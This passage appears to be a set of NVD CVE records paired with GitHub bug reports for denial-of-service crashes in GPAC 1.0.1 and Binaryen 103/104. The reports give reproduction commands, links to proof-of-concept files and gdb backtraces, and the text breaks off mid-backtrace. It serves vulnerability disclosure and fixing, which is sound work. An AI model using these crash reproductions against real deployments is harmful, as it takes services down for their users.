{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/2008" }, { "source": "cve@mitre.org", "tags": null, "url": "https://www.debian.org/security/2023/dsa-5411" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/2008" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://www.debian.org/security/2023/dsa-5411" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:1.0.1:*:*:*:*:*:*:*", "matchCriteriaId": "82DD2D40-0A05-48FD-940D-32B4D8B51AB3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/gpac/gpac/issues/2008
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! - [Yes ] I looked for a similar issue and couldn't find any. - [ Yes] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [ Yes] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95 Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/ **Version:** ``` ./MP4Box -version MP4Box - GPAC version 1.1.0-DEV-rev1574-g8b22f0912-master (c) 2000-2021 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC: https://doi.org/10.1145/1291233.1291452 GPAC Configuration: Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SSL GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_JPEG GPAC_HAS_PNG GPAC_HAS_LINUX_DVB ``` **command:** ``` ./bin/gcc/MP4Box -hint POC5 ``` [POC5.zip](https://github.com/gpac/gpac/files/7764645/POC5.zip) **Result** ``` Abort ``` **bt** ``` Program received signal SIGSEGV, Segmentation fault. [----------------------------------registers-----------------------------------] RAX: 0x400001 RBX: 0x0 RCX: 0x0 RDX: 0x5555555e8080 --> 0x7374737a ('zsts') RSI: 0x0 RDI: 0x5555555db330 --> 0x5555555e0620 --> 0x5555555dfa20 --> 0x7472616b ('kart') RBP: 0x5555555da950 --> 0x0 RSP: 0x7fffffff5c30 --> 0x7fffffff7040 --> 0xffffffff RIP: 0x7ffff7a107d0 (<gf_hinter_finalize+1040>: movzx eax,WORD PTR [r15+0x2]) R8 : 0x0 R9 : 0x5555555eac20 --> 0x5555555eab70 --> 0x5555555ea8a0 --> 0x0 R10: 0x5555555e3860 --> 0x7374626c ('lbts') R11: 0x7ffff76a0be0 --> 0x5555555eacc0 --> 0x0 R12: 0x5555555e82c0 --> 0x10002 R13: 0x5 R14: 0x7fffffff5cb0 ("a=x-copyright: MP4/3GP File hinted with GPAC 1.1.0-DEV-rev1574-g8b22f0912-master - (c) 2000-2021 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io") R15: 0x0 EFLAGS: 0x10246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow) [-------------------------------------code-------------------------------------] 0x7ffff7a107c4 <gf_hinter_finalize+1028>: call 0x7ffff7768fd0 <gf_isom_sdp_add_line@plt> 0x7ffff7a107c9 <gf_hinter_finalize+1033>: jmp 0x7ffff7a1041e <gf_hinter_finalize+94> 0x7ffff7a107ce <gf_hinter_finalize+1038>: xchg ax,ax => 0x7ffff7a107d0 <gf_hinter_finalize+1040>: movzx eax,WORD PTR [r15+0x2] 0x7ffff7a107d5 <gf_hinter_finalize+1045>: cmp WORD PTR [r15+0x4],ax 0x7ffff7a107da <gf_hinter_finalize+1050>: jne 0x7ffff7a10657 <gf_hinter_finalize+663> 0x7ffff7a107e0 <gf_hinter_finalize+1056>: jmp 0x7ffff7a10650 <gf_hinter_finalize+656> 0x7ffff7a107e5 <gf_hinter_finalize+1061>: nop DWORD PTR [rax] [------------------------------------stack-------------------------------------] 0000| 0x7fffffff5c30 --> 0x7fffffff7040 --> 0xffffffff 0008| 0x7fffffff5c38 --> 0x100000000 0016| 0x7fffffff5c40 --> 0x2 0024| 0x7fffffff5c48 --> 0x7ffff76a15c0 --> 0xfbad2887 0032| 0x7fffffff5c50 --> 0x1 0040| 0x7fffffff5c58 --> 0x25 ('%') 0048| 0x7fffffff5c60 --> 0x25 ('%') 0056| 0x7fffffff5c68 --> 0x7ffff76a24a0 --> 0x0 [------------------------------------------------------------------------------] Legend: code, data, rodata, value Stopped reason: SIGSEGV 0x00007ffff7a107d0 in gf_hinter_finalize () from /home/zxq/CVE_testing/source/gpac/bin/gcc/libgpac.so.10 gdb-peda$ bt #0 0x00007ffff7a107d0 in gf_hinter_finalize () from /home/zxq/CVE_testing/source/gpac/bin/gcc/libgpac.so.10 #1 0x000055555557967d in HintFile () #2 0x000055555557d257 in mp4boxMain () #3 0x00007ffff74dc0b3 in __libc_start_main (main=0x55555556d420 <main>, argc=0x3, argv=0x7fffffffe318, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe308) at ../csu/libc-start.c:308 #4 0x000055555556d45e in _start () ```
Untrusted pointer dereference in gf_hinter_finalize ()
https://api.github.com/repos/gpac/gpac/issues/2008/comments
0
2021-12-22T18:56:01Z
2022-01-03T11:21:14Z
https://github.com/gpac/gpac/issues/2008
1,087,094,002
2,008
2,960
CVE-2021-46048
2022-01-10T14:11:17.663
A Denial of Service vulnerability exists in Binaryen 104 due to an assertion abort in wasm::WasmBinaryBuilder::readFunctions.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/WebAssembly/binaryen/issues/4412" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/WebAssembly/binaryen/issues/4412" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:webassembly:binaryen:104:*:*:*:*:*:*:*", "matchCriteriaId": "C9EB2419-1D93-4BAA-83D1-1F6174CAB74E", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "617" ]
617
https://github.com/WebAssembly/binaryen/issues/4412
[ "Exploit", "Third Party Advisory" ]
github.com
[ "WebAssembly", "binaryen" ]
**Version:** ``` version_104 ``` **command:** ``` wasm-opt POC7 ``` [POC7.zip](https://github.com/WebAssembly/binaryen/files/7775613/POC7.zip) **Result** ``` abort ``` **bt** ``` Program received signal SIGABRT, Aborted. [----------------------------------registers-----------------------------------] RAX: 0x0 RBX: 0x7ffff4416040 (0x00007ffff4416040) RCX: 0x7ffff446018b (<__GI_raise+203>: mov rax,QWORD PTR [rsp+0x108]) RDX: 0x0 RSI: 0x7fffffff9970 --> 0x0 RDI: 0x2 RBP: 0x7ffff45d5588 ("%s%s%s:%u: %s%sAssertion `%s' failed.\n%n") RSP: 0x7fffffff9970 --> 0x0 RIP: 0x7ffff446018b (<__GI_raise+203>: mov rax,QWORD PTR [rsp+0x108]) R8 : 0x0 R9 : 0x7fffffff9970 --> 0x0 R10: 0x8 R11: 0x246 R12: 0x7ffff7b29060 ("/home/zxq/CVE_testing/project/binaryen/src/wasm/wasm-binary.cpp") R13: 0x8d4 R14: 0x7ffff7b2b8e0 ("exceptionTargetNames.empty()") R15: 0x615000006200 --> 0x60300001aba0 --> 0x30246c6562616c ('label$0') EFLAGS: 0x246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow) [-------------------------------------code-------------------------------------] 0x7ffff446017f <__GI_raise+191>: mov edi,0x2 0x7ffff4460184 <__GI_raise+196>: mov eax,0xe 0x7ffff4460189 <__GI_raise+201>: syscall => 0x7ffff446018b <__GI_raise+203>: mov rax,QWORD PTR [rsp+0x108] 0x7ffff4460193 <__GI_raise+211>: xor rax,QWORD PTR fs:0x28 0x7ffff446019c <__GI_raise+220>: jne 0x7ffff44601c4 <__GI_raise+260> 0x7ffff446019e <__GI_raise+222>: mov eax,r8d 0x7ffff44601a1 <__GI_raise+225>: add rsp,0x118 [------------------------------------stack-------------------------------------] 0000| 0x7fffffff9970 --> 0x0 0008| 0x7fffffff9978 --> 0x4cb020 (<free>: push rbp) 0016| 0x7fffffff9980 --> 0xfbad8000 --> 0x0 0024| 0x7fffffff9988 --> 0x612000000340 --> 0x74706f2d63000001 0032| 0x7fffffff9990 --> 0x6120000003a5 ("Builder::readFunctions(): Assertion `exceptionTargetNames.empty()' failed.\n") 0040| 0x7fffffff9998 --> 0x612000000340 --> 0x74706f2d63000001 0048| 0x7fffffff99a0 --> 0x612000000340 --> 0x74706f2d63000001 0056| 0x7fffffff99a8 --> 0x6120000003f0 --> 0x0 [------------------------------------------------------------------------------] Legend: code, data, rodata, value Stopped reason: SIGABRT __GI_raise (sig=sig@entry=0x6) at ../sysdeps/unix/sysv/linux/raise.c:50 50 ../sysdeps/unix/sysv/linux/raise.c: No such file or directory. gdb-peda$ bt #0 __GI_raise (sig=sig@entry=0x6) at ../sysdeps/unix/sysv/linux/raise.c:50 #1 0x00007ffff443f859 in __GI_abort () at abort.c:79 #2 0x00007ffff443f729 in __assert_fail_base (fmt=0x7ffff45d5588 "%s%s%s:%u: %s%sAssertion `%s' failed.\n%n", assertion=0x7ffff7b2b8e0 <str> "exceptionTargetNames.empty()", file=0x7ffff7b29060 <str> "/home/zxq/CVE_testing/project/binaryen/src/wasm/wasm-binary.cpp", line=0x8d4, function=<optimized out>) at assert.c:92 #3 0x00007ffff4450f36 in __GI___assert_fail (assertion=0x7ffff7b2b8e0 <str> "exceptionTargetNames.empty()", file=0x7ffff7b29060 <str> "/home/zxq/CVE_testing/project/binaryen/src/wasm/wasm-binary.cpp", line=0x8d4, function=0x7ffff7b2b840 <__PRETTY_FUNCTION__._ZN4wasm17WasmBinaryBuilder13readFunctionsEv> "void wasm::WasmBinaryBuilder::readFunctions()") at assert.c:101 #4 0x00007ffff6ea794d in wasm::WasmBinaryBuilder::readFunctions (this=<optimized out>) at /home/zxq/CVE_testing/project/binaryen/src/wasm/wasm-binary.cpp:2260 #5 0x00007ffff6e988a2 in wasm::WasmBinaryBuilder::read (this=0x7fffffffa6e0) at /home/zxq/CVE_testing/project/binaryen/src/wasm/wasm-binary.cpp:1426 #6 0x00007ffff7046785 in wasm::ModuleReader::readBinaryData (this=<optimized out>, input=..., wasm=..., sourceMapFilename=<incomplete type>) at /home/zxq/CVE_testing/project/binaryen/src/wasm/wasm-io.cpp:63 #7 0x00007ffff7046f76 in wasm::ModuleReader::readBinary (this=<optimized out>, filename=<incomplete type>, wasm=..., sourceMapFilename=<incomplete type>) at /home/zxq/CVE_testing/project/binaryen/src/wasm/wasm-io.cpp:74 #8 0x00007ffff7047e1c in wasm::ModuleReader::read (this=<optimized out>, filename=<incomplete type>, wasm=..., sourceMapFilename=<incomplete type>) at /home/zxq/CVE_testing/project/binaryen/src/wasm/wasm-io.cpp:97 #9 0x00000000006ae0ff in main (argc=<optimized out>, argv=<optimized out>) at /home/zxq/CVE_testing/project/binaryen/src/tools/wasm-opt.cpp:249 #10 0x00007ffff44410b3 in __libc_start_main (main=0x6a6b70 <main(int, char const**)>, argc=0x2, argv=0x7fffffffe328, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe318) at ../csu/libc-start.c:308 #11 0x0000000000452bde in _start () at /usr/bin/../lib/gcc/x86_64-linux-gnu/9/../../../../include/c++/9/iostream:74 ```
A abort failure in wasm::WasmBinaryBuilder::readFunctions
https://api.github.com/repos/WebAssembly/binaryen/issues/4412/comments
3
2021-12-25T07:56:15Z
2025-01-09T11:07:38Z
https://github.com/WebAssembly/binaryen/issues/4412
1,088,564,595
4,412
2,961
CVE-2021-46049
2022-01-10T14:11:18.057
A Pointer Dereference Vulnerability exists in GPAC 1.0.1 via the gf_fileio_check function, which could cause a Denial of Service.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/2013" }, { "source": "cve@mitre.org", "tags": null, "url": "https://www.debian.org/security/2023/dsa-5411" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/2013" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://www.debian.org/security/2023/dsa-5411" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:1.0.1:*:*:*:*:*:*:*", "matchCriteriaId": "82DD2D40-0A05-48FD-940D-32B4D8B51AB3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/gpac/gpac/issues/2013
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! - [Yes ] I looked for a similar issue and couldn't find any. - [ Yes] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [ Yes] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95 Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/ **Version:** ``` ./MP4Box -version MP4Box - GPAC version 1.1.0-DEV-rev1574-g8b22f0912-master (c) 2000-2021 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC: https://doi.org/10.1145/1291233.1291452 GPAC Configuration: Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SSL GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_JPEG GPAC_HAS_PNG GPAC_HAS_LINUX_DVB ``` **command:** ``` ./bin/gcc/MP4Box -par 1=4:3 POC13 ``` [POC13.zip](https://github.com/gpac/gpac/files/7773107/POC13.zip) **Result** ```Segmentation fault ``` **bt** ``` Program received signal SIGSEGV, Segmentation fault. [----------------------------------registers-----------------------------------] RAX: 0x0 RBX: 0x5555555db320 --> 0x5dfd555e1548 RCX: 0x0 RDX: 0x0 RSI: 0x8a8000032c4 RDI: 0x5dfd555e1548 RBP: 0x5dfd555e1548 RSP: 0x7fffffff7fa8 --> 0x7ffff777227c (<gf_fseek+28>: test eax,eax) RIP: 0x7ffff77718e2 (<gf_fileio_check+50>: mov edx,DWORD PTR [rdi]) R8 : 0x5555555e0e80 --> 0x7ffff76a11e0 --> 0x7ffff76a11d0 --> 0x7ffff76a11c0 --> 0x7ffff76a11b0 --> 0x7ffff76a11a0 (--> ...) R9 : 0x0 R10: 0x7ffff76d4625 ("gf_bs_write_long_int") R11: 0x7ffff77747d0 (<gf_bs_write_long_int>: endbr64) R12: 0x8a8000032c4 R13: 0x0 R14: 0x7fffffff84b0 --> 0x0 R15: 0x7fffffff8010 --> 0x5555555c7060 --> 0x0 EFLAGS: 0x10206 (carry PARITY adjust zero sign trap INTERRUPT direction overflow) [-------------------------------------code-------------------------------------] 0x7ffff77718db <gf_fileio_check+43>: je 0x7ffff77718f8 <gf_fileio_check+72> 0x7ffff77718dd <gf_fileio_check+45>: test rdi,rdi 0x7ffff77718e0 <gf_fileio_check+48>: je 0x7ffff77718f8 <gf_fileio_check+72> => 0x7ffff77718e2 <gf_fileio_check+50>: mov edx,DWORD PTR [rdi] 0x7ffff77718e4 <gf_fileio_check+52>: test edx,edx 0x7ffff77718e6 <gf_fileio_check+54>: jne 0x7ffff77718f8 <gf_fileio_check+72> 0x7ffff77718e8 <gf_fileio_check+56>: xor eax,eax 0x7ffff77718ea <gf_fileio_check+58>: cmp QWORD PTR [rdi+0x8],rdi [------------------------------------stack-------------------------------------] 0000| 0x7fffffff7fa8 --> 0x7ffff777227c (<gf_fseek+28>: test eax,eax) 0008| 0x7fffffff7fb0 --> 0x8a8000032c4 0016| 0x7fffffff7fb8 --> 0x0 0024| 0x7fffffff7fc0 --> 0x7fffffff84a0 --> 0x8a8 0032| 0x7fffffff7fc8 --> 0x7ffff77767f4 (<gf_bs_seek+452>: mov QWORD PTR [rbx+0x18],rbp) 0040| 0x7fffffff7fd0 --> 0x5555555daa30 --> 0x0 0048| 0x7fffffff7fd8 --> 0x5555555db320 --> 0x5dfd555e1548 0056| 0x7fffffff7fe0 --> 0x0 [------------------------------------------------------------------------------] Legend: code, data, rodata, value Stopped reason: SIGSEGV 0x00007ffff77718e2 in gf_fileio_check () from /home/zxq/CVE_testing/project/gpac/bin/gcc/libgpac.so.10 gdb-peda$ bt #0 0x00007ffff77718e2 in gf_fileio_check () from /home/zxq/CVE_testing/project/gpac/bin/gcc/libgpac.so.10 #1 0x00007ffff777227c in gf_fseek () from /home/zxq/CVE_testing/project/gpac/bin/gcc/libgpac.so.10 #2 0x00007ffff77767f4 in gf_bs_seek () from /home/zxq/CVE_testing/project/gpac/bin/gcc/libgpac.so.10 #3 0x00007ffff7910c98 in inplace_shift_mdat () from /home/zxq/CVE_testing/project/gpac/bin/gcc/libgpac.so.10 #4 0x00007ffff791549c in WriteToFile () from /home/zxq/CVE_testing/project/gpac/bin/gcc/libgpac.so.10 #5 0x00007ffff7906432 in gf_isom_write () from /home/zxq/CVE_testing/project/gpac/bin/gcc/libgpac.so.10 #6 0x00007ffff79064b8 in gf_isom_close () from /home/zxq/CVE_testing/project/gpac/bin/gcc/libgpac.so.10 #7 0x000055555557bd12 in mp4boxMain () #8 0x00007ffff74dc0b3 in __libc_start_main (main=0x55555556d420 <main>, argc=0x4, argv=0x7fffffffe338, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe328) at ../csu/libc-start.c:308 #9 0x000055555556d45e in _start () ```
Untrusted pointer dereference in gf_fileio_check()
https://api.github.com/repos/gpac/gpac/issues/2013/comments
1
2021-12-24T07:13:51Z
2022-01-03T11:25:17Z
https://github.com/gpac/gpac/issues/2013
1,088,201,752
2,013
2,962
CVE-2021-46050
2022-01-10T14:11:18.467
A Stack Overflow vulnerability exists in Binaryen 103 via the printf_common function.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/WebAssembly/binaryen/issues/4391" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/WebAssembly/binaryen/issues/4391" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:webassembly:binaryen:103:*:*:*:*:*:*:*", "matchCriteriaId": "851AA3FC-CFB5-4A99-A10C-830974545702", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "770" ]
770
https://github.com/WebAssembly/binaryen/issues/4391
[ "Exploit", "Third Party Advisory" ]
github.com
[ "WebAssembly", "binaryen" ]
**Version:** ``` version_103 ``` **System information** **command:** ``` ./bin/wasm-ctor-eval POC4 ``` [POC4.zip](https://github.com/WebAssembly/binaryen/files/7711678/POC4.zip) **Result** ``` 1887835 segmentation fault ./bin/wasm-ctor-eval ``` **GDB information** ``` Program received signal SIGSEGV, Segmentation fault. [----------------------------------registers-----------------------------------] RAX: 0xfbad8001 RBX: 0x0 RCX: 0x0 RDX: 0x7fffff7ff490 --> 0x3000000020 (' ') RSI: 0x7ffff7df5092 --> 0x6d73617700756c25 ('%lu') RDI: 0x7fffff7ff2e0 --> 0x7ffffbad8001 RBP: 0x7fffff7ff2c0 --> 0x7fffff7ff460 --> 0x0 RSP: 0x7fffff7fed50 RIP: 0x7ffff6f16a01 (<__vfprintf_internal+33>: mov DWORD PTR [rbp-0x4c0],ecx) R8 : 0x0 R9 : 0x7fffff7ff3d0 --> 0x0 R10: 0x7ffff6f2c180 (<___vsnprintf>: endbr64) R11: 0x7ffff7088be0 --> 0x555555800a40 --> 0x6201f248 R12: 0x7fffff7ff2e0 --> 0x7ffffbad8001 R13: 0x7ffff7df5092 --> 0x6d73617700756c25 ('%lu') R14: 0x7fffff7ff490 --> 0x3000000020 (' ') R15: 0x7fffff7ff490 --> 0x3000000020 (' ') EFLAGS: 0x10206 (carry PARITY adjust zero sign trap INTERRUPT direction overflow) [-------------------------------------code-------------------------------------] 0x7ffff6f169f6 <__vfprintf_internal+22>: mov r12,rdi 0x7ffff6f169f9 <__vfprintf_internal+25>: push rbx 0x7ffff6f169fa <__vfprintf_internal+26>: sub rsp,0x548 => 0x7ffff6f16a01 <__vfprintf_internal+33>: mov DWORD PTR [rbp-0x4c0],ecx 0x7ffff6f16a07 <__vfprintf_internal+39>: mov rax,QWORD PTR fs:0x28 0x7ffff6f16a10 <__vfprintf_internal+48>: mov QWORD PTR [rbp-0x38],rax 0x7ffff6f16a14 <__vfprintf_internal+52>: xor eax,eax 0x7ffff6f16a16 <__vfprintf_internal+54>: mov rax,QWORD PTR [rip+0x171453] # 0x7ffff7087e70 [------------------------------------stack-------------------------------------] Invalid $SP address: 0x7fffff7fed50 [------------------------------------------------------------------------------] Legend: code, data, rodata, value Stopped reason: SIGSEGV 0x00007ffff6f16a01 in __vfprintf_internal (s=s@entry=0x7fffff7ff2e0, format=format@entry=0x7ffff7df5092 "%lu", ap=ap@entry=0x7fffff7ff490, mode_flags=mode_flags@entry=0x0) at vfprintf-internal.c:1289 1289 vfprintf-internal.c: No such file or directory. gdb-peda$ bt 20 #0 0x00007ffff6f16a01 in __vfprintf_internal (s=s@entry=0x7fffff7ff2e0, format=format@entry=0x7ffff7df5092 "%lu", ap=ap@entry=0x7fffff7ff490, mode_flags=mode_flags@entry=0x0) at vfprintf-internal.c:1289 #1 0x00007ffff6f2c11a in __vsnprintf_internal (string=0x7fffff7ff460 "", maxlen=<optimized out>, format=0x7ffff7df5092 "%lu", args=0x7fffff7ff490, mode_flags=0x0) at vsnprintf.c:114 #2 0x000055555557737f in std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > __gnu_cxx::__to_xstring<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, char>(int (*)(char*, unsigned long, char const*, __va_list_tag*), unsigned long, char const*, ...) () #3 0x00007ffff7c00030 in wasm::WasmBinaryBuilder::getNextLabel() () from /home/zxq/CVE_testing/sourceproject/binaryen/bin/../lib/libbinaryen.so #4 0x00007ffff7c0eeef in wasm::WasmBinaryBuilder::getBlockOrSingleton(wasm::Type) () from /home/zxq/CVE_testing/sourceproject/binaryen/bin/../lib/libbinaryen.so #5 0x00007ffff7c08d57 in wasm::WasmBinaryBuilder::visitTryOrTryInBlock(wasm::Expression*&) () from /home/zxq/CVE_testing/sourceproject/binaryen/bin/../lib/libbinaryen.so #6 0x00007ffff7c0a2c7 in wasm::WasmBinaryBuilder::readExpression(wasm::Expression*&) () from /home/zxq/CVE_testing/sourceproject/binaryen/bin/../lib/libbinaryen.so #7 0x00007ffff7c0b13e in wasm::WasmBinaryBuilder::processExpressions() () from /home/zxq/CVE_testing/sourceproject/binaryen/bin/../lib/libbinaryen.so #8 0x00007ffff7c0ef20 in wasm::WasmBinaryBuilder::getBlockOrSingleton(wasm::Type) () from /home/zxq/CVE_testing/sourceproject/binaryen/bin/../lib/libbinaryen.so #9 0x00007ffff7c08d57 in wasm::WasmBinaryBuilder::visitTryOrTryInBlock(wasm::Expression*&) () from /home/zxq/CVE_testing/sourceproject/binaryen/bin/../lib/libbinaryen.so #10 0x00007ffff7c0a2c7 in wasm::WasmBinaryBuilder::readExpression(wasm::Expression*&) () from /home/zxq/CVE_testing/sourceproject/binaryen/bin/../lib/libbinaryen.so #11 0x00007ffff7c0b13e in wasm::WasmBinaryBuilder::processExpressions() () from /home/zxq/CVE_testing/sourceproject/binaryen/bin/../lib/libbinaryen.so #12 0x00007ffff7c0ef20 in wasm::WasmBinaryBuilder::getBlockOrSingleton(wasm::Type) () from /home/zxq/CVE_testing/sourceproject/binaryen/bin/../lib/libbinaryen.so #13 0x00007ffff7c08d57 in wasm::WasmBinaryBuilder::visitTryOrTryInBlock(wasm::Expression*&) () from 